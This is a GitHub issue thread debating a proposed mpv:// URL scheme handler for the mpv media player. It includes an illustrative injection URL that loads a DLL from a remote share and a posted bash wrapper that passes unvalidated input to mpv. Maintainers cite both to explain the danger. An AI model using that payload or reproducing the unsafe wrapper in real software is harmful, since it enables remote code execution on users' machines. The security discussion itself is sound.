### ISSUE TITLE
Add a x-scheme-handler (custom url protocol)

### ISSUE THREAD

**Issue by FedericoHeichou** [mpv-player/mpv#7985]
I usually use MPV to watch streaming mp4 videos. I think would be nice if MPV manages x-scheme-handler like `mpv://https://domain.null/nicevideo.mp4` by itself.

Actually to accomplish this I created a raw shell script 
```bash
#!/bin/bash
url=`echo "$1" | cut -c 7-`
mpv --player-operation-mode=pseudo-gui "$url"
```

Then I created a `mpv-handler.desktop` with `MimeType=x-scheme-handler/mpv;` and added it to the system mimes.
```bash
[Desktop Entry]
Version=1.0
Type=Application
Terminal=false
Icon[it]=mpv
Name[it]=MPV handler
Exec=/opt/mpv-handler.sh %u
Name=MPV handler
Icon=mpv
MimeType=x-scheme-handler/mpv;
```

So when I click custom URLs like the one above, MPV will open by itself.
I think would be nice if MPV manages a mime protocol like `mpv://` and automatically sets the MimeType during the installation.

**Comment by CounterPillow** [comment]
This is incredibly dangerous, because as far as I know e.g. av:// inputs can lead to arbitrary code execution if done cleverly enough.

**Comment by FedericoHeichou** [comment]
> This is incredibly dangerous, because as far as I know e.g. av:// inputs can lead to arbitrary code execution if done cleverly enough.

Never heard about that. There are many apps which uses x-scheme-handler (for example microsoft teams), so I think you didn't understand my request or I misinterpreted your reply

**Comment by CounterPillow** [comment]
>so I think you didn't understand my request

No, I did not misunderstand your request. You can make mpv load filters from shared libraries through specific URLs. You are suggesting that every mpv installation allow any random web page to do this, and went out of your way to make your own wrapper for this purpose.

Here's an example: `mpv://av://lavfi:ladspa=file=\\some\cifs\share\evil.dll`

**Comment by FedericoHeichou** [comment]
Oh, nice to know, I didn't know this usage of mpv.
Maybe a regex with `mpv://http://` | | `mpv://https://` || `mpv://path/to/local/file/without/colons` could protect it from this libraries injection?

**Comment by CounterPillow** [comment]
Regex is about the worst possible way you could go about this.

The fundamental issue is that the mpv command line does not expect args passed to it from untrusted sources, I just gave you one example of how this can blow up into your face. Playlists, e.g. built with the ytdl hook, have specific whitelists for what input protocols are considered safe.

What you probably want is your own little application that interfaces with mpv and makes sure to only pass things that aren't dangerous in the context of a malicious website auto-redirecting to such an url. You definitely don't want to rely on a wild guess of whether your bash quoting is sound, or other such things. What does your script do when "$url" manages to start with "--"? I can now pass arbitrary mpv options, oopsie!

**Comment by FedericoHeichou** [comment]
Yes for sure my 2 lines bash are not actually secure.
I understand there are no controls and whitelist on arguments, but I think when an argument is passed, it is analyzed to check what mpv should do (for example if the protocol is http mpv should open a stream). Now, if to do this mpv uses a library I understand that regex is a bad option, but if mpv implements all cases by itself, I think is not a problem create a `mpv://` case and if this protocol is matched apply the regex (or other validation methods). Now, as I said if mpv automatically performs action without verify the protocol using libraries, I think is not possible to implement this protocol in a beautiful way. For me is not personally a problem, I only like to share this feature with others and kills in browsers players ☺️

**Comment by avih** [comment]
> So when I click custom URLs like the one above

but no one generates such URLs...

**Comment by Akemi** [comment]
> > So when I click custom URLs like the one above
> 
> but no one generates such URLs...

the point is, you yourself can add such URLs. for some time i had my own script that added a button to all youtube video that i could click and it would open that video in mpv.

the macOS bundle supports this https://github.com/mpv-player/mpv/blob/master/TOOLS/osxbundle/mpv.app/Contents/Info.plist#L193-L202.

**Comment by FedericoHeichou** [comment]
Yes, I have created a script too which generates these URLs and adds a button!

By the way it is progression, before something is invented nobody uses it. Maybe this can't be famous, but everybody can create scripts like mine or Akemi's one. Would be nice if a protocol like `video://` became a standard and every player (native players too) can handle this. In this way every website can add a button, else just create a browser extension which do this would be great

**Comment by Dudemanguy** [comment]
I think it's safe to say that this proposal has been rejected.

**Comment by ManeraKai** [comment]
> but no one generates such URLs...

We do! We're working on an extension called LibRedirect that redirects centralized sites like youtube to decentralized servers like invidious, FreeTube as an app, and we want to add mpv. We can add exceptions for just opening videos and other pages like playlists and channels will be opened with the other front ends like invidious.

https://github.com/libredirect/libredirect/issues/81

**Comment by avih** [comment]
> We do! We're working on an extension ...

Great. Then you can also work on an "extension" to mpv to handle such scheme, same as the builtin `ydl_hook.lua` does for `ytdl://`, and then add it to the 3rd party scripts page https://github.com/mpv-player/mpv/wiki/User-Scripts

If you do that, it should also document the danger in using it, as mentioned earlier in this issue.

But you can't expect mpv to add built-in support for a clearly non-standard protocol which is currently only supported by an extension to one browser, and which currently has exactly 329 users (or downloads?) https://addons.mozilla.org/en-US/firefox/addon/libredirect/

**Comment by ManeraKai** [comment]
![image](https://user-images.githubusercontent.com/40805353/156876043-a879315b-ee28-4aee-a5d9-c3d6dcf0875f.png)
It's still a new extension but it's growing rapidly every day. It has been public before only 38 days.

Anyway

> If you do that, it should also document the danger in using it, as mentioned earlier in this issue.

I read that, it's just stricting the input and preventing SQL injection you can say. Like every other input that needs to be protected.

> But you can't expect mpv to add built-in support for a clearly non-standard protocol

It's wide use as @FedericoHeichou said. It's used by [Google Meet](https://meet.google.com/), [Microsoft Teams](https://www.microsoft.com/en-us/microsoft-teams/group-chat-software), [Zoom](https://zoom.us/), [FreeTube](https://freetubeapp.io/), [Yattee](https://github.com/yattee/yattee), [Element](https://element.io/) and more! It's just really helps the user. Even `mailto:`

**Comment by FedericoHeichou** [comment]
It would a dream :smile: after 2 years I'm still abusing of my js code and wrapper

**Comment by GreyAsteroid** [comment]
IINA implements this (iina://) but hasn't been updated in quite some time. Would love if MPV did as well.

**Comment by Akemi** [comment]
> IINA implements this (iina://) but hasn't been updated in quite some time. Would love if MPV did as well.

mpv on macOS + bundle does support this too btw. https://github.com/mpv-player/mpv/blob/master/TOOLS/osxbundle/mpv.app/Contents/Info.plist#L199-L206

**Comment by tutacat** [comment]
You can do this yourself, but if this was the case, if it wasn't for firefox, etc. asking the user when opening a URI, you could have arbitrary execution with malicious media.

**Comment by FedericoHeichou** [comment]
If you have problems using my example code after updating to Ubuntu 22.04 (idk maybe the problem is some old deleted configuration) you need to reset the path of `LD_LIBRARY_PATH` in the handler because some browsers (in my case Chrome) override it, and it will load some of their libraries (with the same name) instead of the system installed one and mpv could not work (in my case it fails with `vkCreateXlibSurfaceKHR`)

Ubuntu example:
```
export LD_LIBRARY_PATH=/lib/x86_64-linux-gnu
```
I edited my first comment including it in the `mpv-handler.sh`

**Comment by sunrisewestern** [comment]
> > IINA implements this (iina://) but hasn't been updated in quite some time. Would love if MPV did as well.
> 
> mpv on macOS + bundle does support this too btw. https://github.com/mpv-player/mpv/blob/master/TOOLS/osxbundle/mpv.app/Contents/Info.plist#L199-L206

@Akemi It can handle file path url but online content

**Comment by FedericoHeichou** [comment]
2 other years are passed and I am still abusing of that code, time passes really fast and many people mentioned this issue, I did not notice that
